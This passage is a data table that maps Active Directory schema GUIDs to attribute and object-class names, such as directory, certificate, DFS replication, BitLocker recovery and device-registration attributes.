"ae18119f-6390-0045-b32d-97dbc701aef7": "ms-Kds-CreateTime",
"5b06b06a-4cf3-44c0-bd16-43bc10a987da": "ms-DS-Password-Settings-Container",
"963d2732-48be-11d1-a9c3-0000f80367c1": "Certificate-Authority-Object",
"bf9679ac-0de6-11d0-a285-00aa003049e2": "Logon-Workstation",
"adde62c6-1880-41ed-bd3c-30b7d25e14f0": "ms-DFSR-MemberReferenceBL",
"bf9679e5-0de6-11d0-a285-00aa003049e2": "Object-Class",
"bf967a44-0de6-11d0-a285-00aa003049e2": "System-May-Contain",
"9cdfdbc5-0304-4569-95f6-c4f663fe5ae6": "ms-Imaging-Thumbprint-Hash",
"36297dce-656b-4423-ab65-dabb2770819e": "msSFU-30-Domain-Info",
"1677579f-47f3-11d1-a9c3-0000f80367c1": "Certificate-Revocation-List",
"bf9679ad-0de6-11d0-a285-00aa003049e2": "LSA-Creation-Time",
"5eb526d7-d71b-44ae-8cc6-95460052e6ac": "ms-DFSR-ComputerReferenceBL",
"bf9679e6-0de6-11d0-a285-00aa003049e2": "Object-Class-Category",
"bf967a45-0de6-11d0-a285-00aa003049e2": "System-Must-Contain",
"8ae70db5-6406-4196-92fe-f3bb557520a7": "ms-Imaging-Hash-Algorithm",
"da83fc4f-076f-4aea-b4dc-8f4dab9b5993": "ms-DS-Quota-Container",
"2a39c5b1-8960-11d1-aebc-0000f80367c1": "Certificate-Templates",
"bf9679ae-0de6-11d0-a285-00aa003049e2": "LSA-Modified-Count",
"eb20e7d6-32ad-42de-b141-16ad2631b01b": "ms-DFSR-Priority",
"9a7ad94b-ca53-11d1-bbd0-0080c76670c0": "Object-Classes",
"bf967a46-0de6-11d0-a285-00aa003049e2": "System-Only",
"3f78c3e5-f79a-46bd-a0b8-9d18116ddc79": "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity",
"e15334a3-0bf0-4427-b672-11f5d84acc92": "msSFU-30-Network-User",
"548e1c22-dea6-11d0-b010-0000f80367c1": "Class-Display-Name",
"bf9679af-0de6-11d0-a285-00aa003049e2": "Machine-Architecture",
"817cf0b8-db95-4914-b833-5a079ef65764": "ms-DFSR-DeletedPath",
"34aaa216-b699-11d0-afee-0000f80367c1": "Object-Count",
"bf967a47-0de6-11d0-a285-00aa003049e2": "System-Poss-Superiors",
"e362ed86-b728-0842-b27d-2dea7a9df218": "ms-DS-ManagedPassword",
"de91fc26-bd02-4b52-ae26-795999e96fc7": "ms-DS-Quota-Control",
"bf967938-0de6-11d0-a285-00aa003049e2": "Code-Page",
"c9b6358e-bb38-11d0-afef-0000f80367c1": "Machine-Password-Change-Interval",
"53ed9ad1-9975-41f4-83f5-0c061a12553a": "ms-DFSR-DeletedSizeInMb",
"bf9679e7-0de6-11d0-a285-00aa003049e2": "Object-Guid",
"bf967a49-0de6-11d0-a285-00aa003049e2": "Telephone-Number",
"0e78295a-c6d3-0a40-b491-d62251ffa0a6": "ms-DS-ManagedPasswordId",
"faf733d0-f8eb-4dcf-8d75-f1753af6a50b": "msSFU-30-NIS-Map-Config",
"bf96793b-0de6-11d0-a285-00aa003049e2": "COM-ClassID",
"bf9679b2-0de6-11d0-a285-00aa003049e2": "Machine-Role",
"5ac48021-e447-46e7-9d23-92c0c6a90dfb": "ms-DFSR-ReadOnly",
"bf9679e8-0de6-11d0-a285-00aa003049e2": "Object-Sid",
"bf967a4a-0de6-11d0-a285-00aa003049e2": "Teletex-Terminal-Identifier",
"d0d62131-2d4a-d04f-99d9-1c63646229a4": "ms-DS-ManagedPasswordPreviousId",
"ce206244-5827-4a86-ba1c-1c0c386c1b64": "ms-DS-Managed-Service-Account",
"281416d9-1968-11d0-a28f-00aa003049e2": "COM-CLSID",
"80a67e4f-9f22-11d0-afdd-00c04fd930c9": "Machine-Wide-Policy",
"db7a08e7-fc76-4569-a45f-f5ecb66a88b5": "ms-DFSR-CachePolicy",
"16775848-47f3-11d1-a9c3-0000f80367c1": "Object-Version",
"bf967a4b-0de6-11d0-a285-00aa003049e2": "Telex-Number",
"f8758ef7-ac76-8843-a2ee-a26b4dcaf409": "ms-DS-ManagedPasswordInterval",
"1cb81863-b822-4379-9ea2-5ff7bdc6386d": "ms-net-ieee-80211-GroupPolicy",
"bf96793c-0de6-11d0-a285-00aa003049e2": "COM-InterfaceID",
"0296c120-40da-11d1-a9c0-0000f80367c1": "Managed-By",
"4c5d607a-ce49-444a-9862-82a95f5d1fcc": "ms-DFSR-MinDurationCacheInMin",
"bf9679ea-0de6-11d0-a285-00aa003049e2": "OEM-Information",
"0296c121-40da-11d1-a9c0-0000f80367c1": "Telex-Primary",
"888eedd6-ce04-df40-b462-b8a50e41ba38": "ms-DS-GroupMSAMembership",
"281416dd-1968-11d0-a28f-00aa003049e2": "COM-Other-Prog-Id",
"0296c124-40da-11d1-a9c0-0000f80367c1": "Managed-Objects",
"2ab0e48d-ac4e-4afc-83e5-a34240db6198": "ms-DFSR-MaxAgeInCacheInMin",
"bf9679ec-0de6-11d0-a285-00aa003049e2": "OM-Object-Class",
"ed9de9a0-7041-11d2-9905-0000f87a57d4": "Template-Roots",
"55872b71-c4b2-3b48-ae51-4095f91ec600": "ms-DS-Transformation-Rules",
"99a03a6a-ab19-4446-9350-0cb878ed2d9b": "ms-net-ieee-8023-GroupPolicy",
"bf96793d-0de6-11d0-a285-00aa003049e2": "COM-ProgID",
"bf9679b5-0de6-11d0-a285-00aa003049e2": "Manager",
"43061ac1-c8ad-4ccc-b785-2bfac20fc60a": "ms-FVE-RecoveryPassword",
"bf9679ed-0de6-11d0-a285-00aa003049e2": "OM-Syntax",
"6db69a1c-9422-11d1-aebd-0000f80367c1": "Terminal-Server",
"86284c08-0c6e-1540-8b15-75147d23d20d": "ms-DS-Ingress-Claims-Transformation-Policy",
"fa85c591-197f-477e-83bd-ea5a43df2239": "ms-DFSR-LocalSettings",
"281416db-1968-11d0-a28f-00aa003049e2": "COM-Treat-As-Class-Id",
"bf9679b7-0de6-11d0-a285-00aa003049e2": "MAPI-ID",
"85e5a5cf-dcee-4075-9cfd-ac9db6a2f245": "ms-FVE-VolumeGuid",
"ddac0cf3-af8f-11d0-afeb-00c04fd930c9": "OMT-Guid",
"f0f8ffa7-1191-11d0-a060-00aa006c33ed": "Text-Country",
"c137427e-9a73-b040-9190-1b095bb43288": "ms-DS-Egress-Claims-Transformation-Policy",
"ea715d30-8f53-40d0-bd1e-6109186d782c": "ms-FVE-RecoveryInformation",
"281416de-1968-11d0-a28f-00aa003049e2": "COM-Typelib-Id",
"bf9679b9-0de6-11d0-a285-00aa003049e2": "Marshalled-Interface",
"1fd55ea8-88a7-47dc-8129-0daa97186a54": "ms-FVE-KeyPackage",
"1f0075fa-7e40-11d0-afd6-00c04fd930c9": "OMT-Indx-Guid",
"a8df7489-c5ea-11d1-bbcb-0080c76670c0": "Text-Encoded-OR-Address",
"d5006229-9913-2242-8b17-83761d1e0e5b": "ms-DS-TDO-Egress-BL",
"e11505d7-92c4-43e7-bf5c-295832ffc896": "ms-DFSR-Subscriber",
"281416da-1968-11d0-a28f-00aa003049e2": "COM-Unique-LIBID",
"e48e64e0-12c9-11d3-9102-00c04fd91ab1": "Mastered-By",
"f76909bc-e678-47a0-b0b3-f86a0044c06d": "ms-FVE-RecoveryGuid",
"3e978925-8c01-11d0-afda-00c04fd930c9": "Operating-System",
"ddac0cf1-af8f-11d0-afeb-00c04fd930c9": "Time-Refresh",
"5a5661a1-97c6-544b-8056-e430fe7bc554": "ms-DS-TDO-Ingress-BL",
"25173408-04ca-40e8-865e-3f9ce9bf1bd3": "ms-DFS-Deleted-Link-v2",
"bf96793e-0de6-11d0-a285-00aa003049e2": "Comment",
"bf9679bb-0de6-11d0-a285-00aa003049e2": "Max-Pwd-Age",
"aa4e1a6d-550d-4e05-8c35-4afcb917a9fe": "ms-TPM-OwnerInformation",
"bd951b3c-9c96-11d0-afdd-00c04fd930c9": "Operating-System-Hotfix",
"ddac0cf0-af8f-11d0-afeb-00c04fd930c9": "Time-Vol-Change",
"0bb49a10-536b-bc4d-a273-0bab0dd4bd10": "ms-DS-Transformation-Rules-Compiled",
"67212414-7bcc-4609-87e0-088dad8abdee": "ms-DFSR-Subscription",
"bf96793f-0de6-11d0-a285-00aa003049e2": "Common-Name",
"bf9679bc-0de6-11d0-a285-00aa003049e2": "Max-Renew-Age",
"0e0d0938-2658-4580-a9f6-7a0ac7b566cb": "ms-ieee-80211-Data",
"3e978927-8c01-11d0-afda-00c04fd930c9": "Operating-System-Service-Pack",
"bf967a55-0de6-11d0-a285-00aa003049e2": "Title",
"693f2006-5764-3d4a-8439-58f04aab4b59": "ms-DS-Applies-To-Resource-Types",
"7769fb7a-1159-4e96-9ccd-68bc487073eb": "ms-DFS-Link-v2",
"f0f8ff88-1191-11d0-a060-00aa006c33ed": "Company",
"bf9679bd-0de6-11d0-a285-00aa003049e2": "Max-Storage",
"6558b180-35da-4efe-beed-521f8f48cafb": "ms-ieee-80211-Data-Type",
"3e978926-8c01-11d0-afda-00c04fd930c9": "Operating-System-Version",
"16c3a860-1273-11d0-a060-00aa006c33ed": "Tombstone-Lifetime",
"24977c8c-c1b7-3340-b4f6-2b375eb711d7": "ms-DS-RID-Pool-Allocation-Enabled",
"7b35dbad-b3ec-486a-aad4-2fec9d6ea6f6": "ms-DFSR-GlobalSettings",
"bf967943-0de6-11d0-a285-00aa003049e2": "Content-Indexing-Allowed",
"bf9679be-0de6-11d0-a285-00aa003049e2": "Max-Ticket-Age",
"7f73ef75-14c9-4c23-81de-dd07a06f9e8b": "ms-ieee-80211-ID",
"bf9679ee-0de6-11d0-a285-00aa003049e2": "Operator-Count",
"c1dc867c-a261-11d1-b606-0000f80367c1": "Transport-Address-Attribute",
"9709eaaf-49da-4db2-908a-0446e5eab844": "ms-DS-cloudExtensionAttribute1",
"da73a085-6e64-4d61-b064-015d04164795": "ms-DFS-Namespace-Anchor",
"4d8601ee-ac85-11d0-afe3-00c04fd930c9": "Context-Menu",
"bf9679bf-0de6-11d0-a285-00aa003049e2": "May-Contain",
"8a5c99e9-2230-46eb-b8e8-e59d712eb9ee": "ms-IIS-FTP-Dir",
"963d274d-48be-11d1-a9c3-0000f80367c1": "Option-Description",
"26d97372-6070-11d1-a9c6-0000f80367c1": "Transport-DLL-Name",
"f34ee0ac-c0c1-4ba9-82c9-1a90752f16a5": "ms-DS-cloudExtensionAttribute2",
"1c332fe0-0c2a-4f32-afca-23c5e45a9e77": "ms-DFSR-ReplicationGroup",
"6da8a4fc-0e52-11d0-a286-00aa003049e2": "Control-Access-Rights",
"11b6cc8b-48c4-11d1-a9c3-0000f80367c1": "meetingAdvertiseScope",
"2a7827a4-1483-49a5-9d84-52e3812156b4": "ms-IIS-FTP-Root",
"19195a53-6da0-11d0-afd3-00c04fd930c9": "Options",
"26d97374-6070-11d1-a9c6-0000f80367c1": "Transport-Type",
"82f6c81a-fada-4a0d-b0f7-706d46838eb5": "ms-DS-cloudExtensionAttribute3",
"21cb8628-f3c3-4bbf-bff6-060b2d8f299a": "ms-DFS-Namespace-v2",
"bf967944-0de6-11d0-a285-00aa003049e2": "Cost",
"11b6cc83-48c4-11d1-a9c3-0000f80367c1": "meetingApplication",
"51583ce9-94fa-4b12-b990-304c35b18595": "ms-Imaging-PSP-Identifier",
"963d274e-48be-11d1-a9c3-0000f80367c1": "Options-Location",
"8fd044e3-771f-11d1-aeae-0000f80367c1": "Treat-As-Leaf",
"9cbf3437-4e6e-485b-b291-22b02554273f": "ms-DS-cloudExtensionAttribute4",
"64759b35-d3a1-42e4-b5f1-a3de162109b3": "ms-DFSR-Content",
"508ca374-a511-4e4e-9f4f-856f61a6b7e4": "Address-Book-Roots2",
"5fd42471-1262-11d0-a060-00aa006c33ed": "Country-Code",
"11b6cc92-48c4-11d1-a9c3-0000f80367c1": "meetingBandwidth",
"7b6760ae-d6ed-44a6-b6be-9de62c09ec67": "ms-Imaging-PSP-String",
"bf9679ef-0de6-11d0-a285-00aa003049e2": "Organization-Name",
"28630ebd-41d5-11d1-a9c1-0000f80367c1": "Tree-Name",
"2915e85b-e347-4852-aabb-22e5a651c864": "ms-DS-cloudExtensionAttribute5",
"4898f63d-4112-477c-8826-3ca00bd8277d": "Global-Address-List2",
"bf967945-0de6-11d0-a285-00aa003049e2": "Country-Name",
"11b6cc93-48c4-11d1-a9c3-0000f80367c1": "meetingBlob",
"35697062-1eaf-448b-ac1e-388e0be4fdee": "ms-net-ieee-80211-GP-PolicyGUID",
"bf9679f0-0de6-11d0-a285-00aa003049e2": "Organizational-Unit-Name",
"80a67e5a-9f22-11d0-afdd-00c04fd930c9": "Trust-Attributes",
"60452679-28e1-4bec-ace3-712833361456": "ms-DS-cloudExtensionAttribute6",
"4937f40d-a6dc-4d48-97ca-06e5fbfd3f16": "ms-DFSR-ContentSet",
"b1cba91a-0682-4362-a659-153e201ef069": "Template-Roots2",
"2b09958a-8931-11d1-aebc-0000f80367c1": "Create-Dialog",
"11b6cc87-48c4-11d1-a9c3-0000f80367c1": "meetingContactInfo",
"9c1495a5-4d76-468e-991e-1433b0a67855": "ms-net-ieee-80211-GP-PolicyData",
"28596019-7349-4d2f-adff-5a629961f942": "organizationalStatus",
"bf967a59-0de6-11d0-a285-00aa003049e2": "Trust-Auth-Incoming",
"4a7c1319-e34e-40c2-9d00-60ff7890f207": "ms-DS-cloudExtensionAttribute7",
"2df90d73-009f-11d2-aa4c-00c04fd7d83a": "Create-Time-Stamp",
"11b6cc7e-48c4-11d1-a9c3-0000f80367c1": "meetingDescription",
"0f69c62e-088e-4ff5-a53a-e923cec07c0a": "ms-net-ieee-80211-GP-PolicyReserved",
"5fd424ce-1262-11d0-a060-00aa006c33ed": "Original-Display-Table",
"bf967a5f-0de6-11d0-a285-00aa003049e2": "Trust-Auth-Outgoing",
"3cd1c514-8449-44ca-81c0-021781800d2a": "ms-DS-cloudExtensionAttribute8",
"04828aa9-6e42-4e80-b962-e2fe00754d17": "ms-DFSR-Topology",
"b8442f58-c490-4487-8a9d-d80b883271ad": "ms-DS-Claim-Type-Property-Base",
"2b09958b-8931-11d1-aebc-0000f80367c1": "Create-Wizard-Ext",
"11b6cc91-48c4-11d1-a9c3-0000f80367c1": "meetingEndTime",
"94a7b05a-b8b2-4f59-9c25-39e69baa1684": "ms-net-ieee-8023-GP-PolicyGUID",
"5fd424cf-1262-11d0-a060-00aa006c33ed": "Original-Display-Table-MSDOS",
"bf967a5c-0de6-11d0-a285-00aa003049e2": "Trust-Direction",
"0a63e12c-3040-4441-ae26-cd95af0d247e": "ms-DS-cloudExtensionAttribute9",
"bf967946-0de6-11d0-a285-00aa003049e2": "Creation-Time",
"11b6cc7c-48c4-11d1-a9c3-0000f80367c1": "meetingID",
"8398948b-7457-4d91-bd4d-8d7ed669c9f7": "ms-net-ieee-8023-GP-PolicyData",
"bf9679f1-0de6-11d0-a285-00aa003049e2": "Other-Login-Workstations",
"b000ea7a-a086-11d0-afdd-00c04fd930c9": "Trust-Parent",
"670afcb3-13bd-47fc-90b3-0a527ed81ab7": "ms-DS-cloudExtensionAttribute10",
"4229c897-c211-437c-a5ae-dbf705b696e5": "ms-DFSR-Member",
"36093235-c715-4821-ab6a-b56fb2805a58": "ms-DS-Claim-Types",
"4d8601ed-ac85-11d0-afe3-00c04fd930c9": "Creation-Wizard",
"11b6cc89-48c4-11d1-a9c3-0000f80367c1": "meetingIP",
"d3c527c7-2606-4deb-8cfd-18426feec8ce": "ms-net-ieee-8023-GP-PolicyReserved",
"0296c123-40da-11d1-a9c0-0000f80367c1": "Other-Mailbox",
"bf967a5d-0de6-11d0-a285-00aa003049e2": "Trust-Partner",
"9e9ebbc8-7da5-42a6-8925-244e12a56e24": "ms-DS-cloudExtensionAttribute11",
"7bfdcb85-4807-11d1-a9c3-0000f80367c1": "Creator",
"11b6cc8e-48c4-11d1-a9c3-0000f80367c1": "meetingIsEncrypted",
"3164c36a-ba26-468c-8bda-c1e5cc256728": "ms-PKI-Cert-Template-OID",
"bf9679f2-0de6-11d0-a285-00aa003049e2": "Other-Name",
"bf967a5e-0de6-11d0-a285-00aa003049e2": "Trust-Posix-Offset",
"3c01c43d-e10b-4fca-92b2-4cf615d5b09a": "ms-DS-cloudExtensionAttribute12",
"e58f972e-64b5-46ef-8d8b-bbc3e1897eab": "ms-DFSR-Connection",
"7a4a4584-b350-478f-acd6-b4b852d82cc0": "ms-DS-Resource-Properties",
"963d2737-48be-11d1-a9c3-0000f80367c1": "CRL-Object",
"11b6cc7f-48c4-11d1-a9c3-0000f80367c1": "meetingKeyword",
"dbd90548-aa37-4202-9966-8c537ba5ce32": "ms-PKI-Certificate-Application-Policy",
"1ea64e5d-ac0f-11d2-90df-00c04fd91ab1": "Other-Well-Known-Objects",
"bf967a60-0de6-11d0-a285-00aa003049e2": "Trust-Type",
"28be464b-ab90-4b79-a6b0-df437431d036": "ms-DS-cloudExtensionAttribute13",
"963d2731-48be-11d1-a9c3-0000f80367c1": "CRL-Partitioned-Revocation-List",
"11b6cc84-48c4-11d1-a9c3-0000f80367c1": "meetingLanguage",
"ea1dddc4-60ff-416e-8cc0-17cee534bce7": "ms-PKI-Certificate-Name-Flag",
"bf9679f3-0de6-11d0-a285-00aa003049e2": "Owner",
"bf967a61-0de6-11d0-a285-00aa003049e2": "UAS-Compat",
"cebcb6ba-6e80-4927-8560-98feca086a9f": "ms-DS-cloudExtensionAttribute14",
"7b9a2d92-b7eb-4382-9772-c3e0f9baaf94": "ms-ieee-80211-Policy",
"81a3857c-5469-4d8f-aae6-c27699762604": "ms-DS-Claim-Type",
"167757b2-47f3-11d1-a9c3-0000f80367c1": "Cross-Certificate-Pair",
"11b6cc80-48c4-11d1-a9c3-0000f80367c1": "meetingLocation",
"38942346-cc5b-424b-a7d8-6ffd12029c5f": "ms-PKI-Certificate-Policy",
"7d6c0e99-7e20-11d0-afd6-00c04fd930c9": "Package-Flags",
"0bb0fca0-1e89-429f-901a-1413894d9f59": "uid",
"aae4d537-8af0-4daa-9cc6-62eadb84ff03": "ms-DS-cloudExtensionAttribute15",
"1f0075fe-7e40-11d0-afd6-00c04fd930c9": "Curr-Machine-Id",
"11b6cc85-48c4-11d1-a9c3-0000f80367c1": "meetingMaxParticipants",
"b7ff5a38-0818-42b0-8110-d3d154c97f24": "ms-PKI-Credential-Roaming-Tokens",
"7d6c0e98-7e20-11d0-afd6-00c04fd930c9": "Package-Name",
"bf967a64-0de6-11d0-a285-00aa003049e2": "UNC-Name",
"9581215b-5196-4053-a11e-6ffcafc62c4d": "ms-DS-cloudExtensionAttribute16",
"a0ed2ac1-970c-4777-848e-ec63a0ec44fc": "ms-Imaging-PSPs",
"5b283d5e-8404-4195-9339-8450188c501a": "ms-DS-Resource-Property",
"1f0075fc-7e40-11d0-afd6-00c04fd930c9": "Current-Location",
"11b6cc7d-48c4-11d1-a9c3-0000f80367c1": "meetingName",
"d15ef7d8-f226-46db-ae79-b34e560bd12c": "ms-PKI-Enrollment-Flag",
"7d6c0e96-7e20-11d0-afd6-00c04fd930c9": "Package-Type",
"bf9679e1-0de6-11d0-a285-00aa003049e2": "Unicode-Pwd",
"3d3c6dda-6be8-4229-967e-2ff5bb93b4ce": "ms-DS-cloudExtensionAttribute17",
"963d273f-48be-11d1-a9c3-0000f80367c1": "Current-Parent-CA",
"11b6cc86-48c4-11d1-a9c3-0000f80367c1": "meetingOriginator",
"f22bd38f-a1d0-4832-8b28-0331438886a6": "ms-PKI-Enrollment-Servers",
"5245801b-ca6a-11d0-afff-0000f80367c1": "Parent-CA",
"ba0184c7-38c5-4bed-a526-75421470580c": "uniqueIdentifier",
"88e73b34-0aa6-4469-9842-6eb01b32a5b5": "ms-DS-cloudExtensionAttribute18",
"1f7c257c-b8a3-4525-82f8-11ccc7bee36e": "ms-Imaging-PostScanProcess",
"72e3d47a-b342-4d45-8f56-baff803cabf9": "ms-DS-Resource-Property-List",
"bf967947-0de6-11d0-a285-00aa003049e2": "Current-Value",
"11b6cc88-48c4-11d1-a9c3-0000f80367c1": "meetingOwner",
"e96a63f5-417f-46d3-be52-db7703c503df": "ms-PKI-Minimal-Key-Size",
"963d2733-48be-11d1-a9c3-0000f80367c1": "Parent-CA-Certificate-Chain",
"8f888726-f80a-44d7-b1ee-cb9df21392c8": "uniqueMember",
"0975fe99-9607-468a-8e18-c800d3387395": "ms-DS-cloudExtensionAttribute19",
"bf96799c-0de6-11d0-a285-00aa003049e2": "DBCS-Pwd",
"11b6cc81-48c4-11d1-a9c3-0000f80367c1": "meetingProtocol",
"8c9e1288-5028-4f4f-a704-76d026f246ef": "ms-PKI-OID-Attribute",
"2df90d74-009f-11d2-aa4c-00c04fd7d83a": "Parent-GUID",
"50950839-cc4c-4491-863a-fcf942d684b7": "unstructuredAddress",
"f5446328-8b6e-498d-95a8-211748d5acdc": "ms-DS-cloudExtensionAttribute20",
"a16f33c7-7fd6-4828-9364-435138fda08d": "ms-Print-ConnectionPolicy",
"b72f862b-bb25-4d5d-aa51-62c59bdf90ae": "ms-SPP-Activation-Objects-Container",
"bf967948-0de6-11d0-a285-00aa003049e2": "Default-Class-Store",
"11b6cc8d-48c4-11d1-a9c3-0000f80367c1": "meetingRating",
"5f49940e-a79f-4a51-bb6f-3d446a54dc6b": "ms-PKI-OID-CPS",
"28630ec0-41d5-11d1-a9c1-0000f80367c1": "Partial-Attribute-Deletion-List",
"9c8ef177-41cf-45c9-9673-7716c0c8901b": "unstructuredName",
"6b3d6fda-0893-43c4-89fb-1fb52a6616a9": "ms-DS-Issuer-Certificates",
"720bc4e2-a54a-11d0-afdf-00c04fd930c9": "Default-Group",
"11b6cc8f-48c4-11d1-a9c3-0000f80367c1": "meetingRecurrence",
"7d59a816-bb05-4a72-971f-5c1331f67559": "ms-PKI-OID-LocalizedName",
"19405b9e-3cfa-11d1-a9c0-0000f80367c1": "Partial-Attribute-Set",
"d9e18312-8939-11d1-aebc-0000f80367c1": "Upgrade-Product-Code",
"ca3286c2-1f64-4079-96bc-e62b610e730f": "ms-DS-Registration-Quota",
"37cfd85c-6719-4ad8-8f9e-8678ba627563": "ms-PKI-Enterprise-Oid",
"51a0e68c-0dc5-43ca-935d-c1c911bf2ee5": "ms-SPP-Activation-Object",
"b7b13116-b82e-11d0-afee-0000f80367c1": "Default-Hiding-Value",
"11b6cc8a-48c4-11d1-a9c3-0000f80367c1": "meetingScope",
"04c4da7a-e114-4e69-88de-e293f2d3b395": "ms-PKI-OID-User-Notice",
"07383084-91df-11d1-aebc-0000f80367c1": "Pek-Key-Change-Interval",
"032160bf-9824-11d1-aec0-0000f80367c1": "UPN-Suffixes",
"0a5caa39-05e6-49ca-b808-025b936610e7": "ms-DS-Maximum-Registration-Inactivity-Period",
"bf96799f-0de6-11d0-a285-00aa003049e2": "Default-Local-Policy-Object",
"11b6cc90-48c4-11d1-a9c3-0000f80367c1": "meetingStartTime",
"bab04ac2-0435-4709-9307-28380e7c7001": "ms-PKI-Private-Key-Flag",
"07383083-91df-11d1-aebc-0000f80367c1": "Pek-List",
"bf967a68-0de6-11d0-a285-00aa003049e2": "User-Account-Control",
"e3fb56c8-5de8-45f5-b1b1-d2b6cd31e762": "ms-DS-Device-Location",
"26ccf238-a08e-4b86-9a82-a8c9ac7ee5cb": "ms-PKI-Key-Recovery-Agent",
"e027a8bd-6456-45de-90a3-38593877ee74": "ms-TPM-Information-Objects-Container",
"26d97367-6070-11d1-a9c6-0000f80367c1": "Default-Object-Category",
"11b6cc82-48c4-11d1-a9c3-0000f80367c1": "meetingType",
"0cd8711f-0afc-4926-a4b1-09b08d3d436c": "ms-PKI-Site-Name",
"963d273c-48be-11d1-a9c3-0000f80367c1": "Pending-CA-Certificates",
"bf967a69-0de6-11d0-a285-00aa003049e2": "User-Cert",
"617626e9-01eb-42cf-991f-ce617982237e": "ms-DS-Registered-Owner",
"281416c8-1968-11d0-a28f-00aa003049e2": "Default-Priority",
"11b6cc8c-48c4-11d1-a9c3-0000f80367c1": "meetingURL",
"9de8ae7d-7a5b-421d-b5e4-061f79dfd5d7": "ms-PKI-Supersede-Templates",
"963d273e-48be-11d1-a9c3-0000f80367c1": "Pending-Parent-CA",
"bf967a6a-0de6-11d0-a285-00aa003049e2": "User-Comment",
"0449160c-5a8e-4fc8-b052-01c0f6e48f02": "ms-DS-Registered-Users",
"05f6c878-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLServer",
"85045b6a-47a6-4243-a7cc-6890701f662c": "ms-TPM-Information-Object",
"807a6d30-1669-11d0-a064-00aa006c33ed": "Default-Security-Descriptor",
"bf9679c0-0de6-11d0-a285-00aa003049e2": "Member",
"13f5236c-1884-46b1-b5d0-484e38990d58": "ms-PKI-Template-Minor-Revision",
"5fd424d3-1262-11d0-a060-00aa006c33ed": "Per-Msg-Dialog-Display-Table",
"bf967a6d-0de6-11d0-a285-00aa003049e2": "User-Parameters",
"a34f983b-84c6-4f0c-9050-a3a14a1d35a4": "ms-DS-Approximate-Last-Logon-Time-Stamp",
"167757b5-47f3-11d1-a9c3-0000f80367c1": "Delta-Revocation-List",
"0296c122-40da-11d1-a9c0-0000f80367c1": "MHS-OR-Address",
"0c15e9f5-491d-4594-918f-32813a091da9": "ms-PKI-Template-Schema-Version",
"5fd424d4-1262-11d0-a060-00aa006c33ed": "Per-Recip-Dialog-Display-Table",
"bf967a6e-0de6-11d0-a285-00aa003049e2": "User-Password",
"22a95c0e-1f83-4c82-94ce-bea688cfc871": "ms-DS-Is-Enabled",
"0c7e18ea-ccef-11d2-9993-0000f87a57d4": "MS-SQL-OLAPServer",
"ef2fc3ed-6e18-415b-99e4-3114a8cb124b": "ms-DNS-Server-Settings",
"bf96794f-0de6-11d0-a285-00aa003049e2": "Department",
"bf9679c2-0de6-11d0-a285-00aa003049e2": "Min-Pwd-Age",
"3c91fbbf-4773-4ccd-a87b-85d53e7bcf6a": "ms-PKI-RA-Application-Policies",
"16775858-47f3-11d1-a9c3-0000f80367c1": "Personal-Title",
"11732a8a-e14d-4cc5-b92f-d93f51c6d8e4": "userClass",
"100e454d-f3bb-4dcb-845f-8d5edc471c59": "ms-DS-Device-OS-Type",
"be9ef6ee-cbc7-4f22-b27b-96967e7ee585": "departmentNumber",
"bf9679c3-0de6-11d0-a285-00aa003049e2": "Min-Pwd-Length",
"d546ae22-0951-4d47-817e-1c9f96faad46": "ms-PKI-RA-Policies",
"0296c11d-40da-11d1-a9c0-0000f80367c1": "Phone-Fax-Other",
"23998ab5-70f8-4007-a4c1-a84a38311f9a": "userPKCS12",
"70fb8c63-5fab-4504-ab9d-14b329a8a7f8": "ms-DS-Device-OS-Version",
"11d43c5c-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLRepository",
"555c21c3-a136-455a-9397-796bbd358e25": "ms-Authz-Central-Access-Policies",
"bf967950-0de6-11d0-a285-00aa003049e2": "Description",
"bf9679c4-0de6-11d0-a285-00aa003049e2": "Min-Ticket-Age",
"fe17e04b-937d-4f7e-8e0e-9292c8d5683e": "ms-PKI-RA-Signature",
"f0f8ffa2-1191-11d0-a060-00aa006c33ed": "Phone-Home-Other",
"28630ebb-41d5-11d1-a9c1-0000f80367c1": "User-Principal-Name",
"90615414-a2a0-4447-a993-53409599b74e": "ms-DS-Device-Physical-IDs",
"eea65906-8ac6-11d0-afda-00c04fd930c9": "Desktop-Profile",
"bf9679c5-0de6-11d0-a285-00aa003049e2": "Modified-Count",
"6617e4ac-a2f1-43ab-b60c-11fbd1facf05": "ms-PKI-RoamingTimeStamp",
"f0f8ffa1-1191-11d0-a060-00aa006c33ed": "Phone-Home-Primary",
"9a9a021f-4a5b-11d1-a9c3-0000f80367c1": "User-Shared-Folder",
"c30181c7-6342-41fb-b279-f7c566cbe0a7": "ms-DS-Device-ID",
"17c2f64e-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLPublication",
"99bb1b7a-606d-4f8b-800e-e15be554ca8d": "ms-Authz-Central-Access-Rules",
"974c9a02-33fc-11d3-aa6e-00c04f8eedd8": "msExch-Proxy-Gen-Options",
"bf967951-0de6-11d0-a285-00aa003049e2": "Destination-Indicator",
"bf9679c6-0de6-11d0-a285-00aa003049e2": "Modified-Count-At-Last-Prom",
"b3f93023-9239-4f7c-b99c-6745d87adbc2": "ms-PKI-DPAPIMasterKeys",
"4d146e4b-48d4-11d1-a9c3-0000f80367c1": "Phone-Ip-Other",
"9a9a0220-4a5b-11d1-a9c3-0000f80367c1": "User-Shared-Folder-Other",
"ef65695a-f179-4e6a-93de-b01e06681cfb": "ms-DS-Device-Object-Version",
"963d2750-48be-11d1-a9c3-0000f80367c1": "dhcp-Classes",
"9a7ad94a-ca53-11d1-bbd0-0080c76670c0": "Modify-Time-Stamp",
"b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7": "ms-PKI-AccountCredentials",
"4d146e4a-48d4-11d1-a9c3-0000f80367c1": "Phone-Ip-Primary",
"e16a9db2-403c-11d1-a9c0-0000f80367c1": "User-SMIME-Certificate",
"862166b6-c941-4727-9565-48bfff2941de": "ms-DS-Is-Member-Of-DL-Transitive",
"1d08694a-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLDatabase",
"5b4a06dc-251c-4edb-8813-0bdd71327226": "ms-Authz-Central-Access-Rule",
"963d2741-48be-11d1-a9c3-0000f80367c1": "dhcp-Flags",
"bf9679c7-0de6-11d0-a285-00aa003049e2": "Moniker",
"f39b98ad-938d-11d1-aebd-0000f80367c1": "ms-RRAS-Attribute",
"0296c11f-40da-11d1-a9c0-0000f80367c1": "Phone-ISDN-Primary",
"bf9679d7-0de6-11d0-a285-00aa003049e2": "User-Workstations",
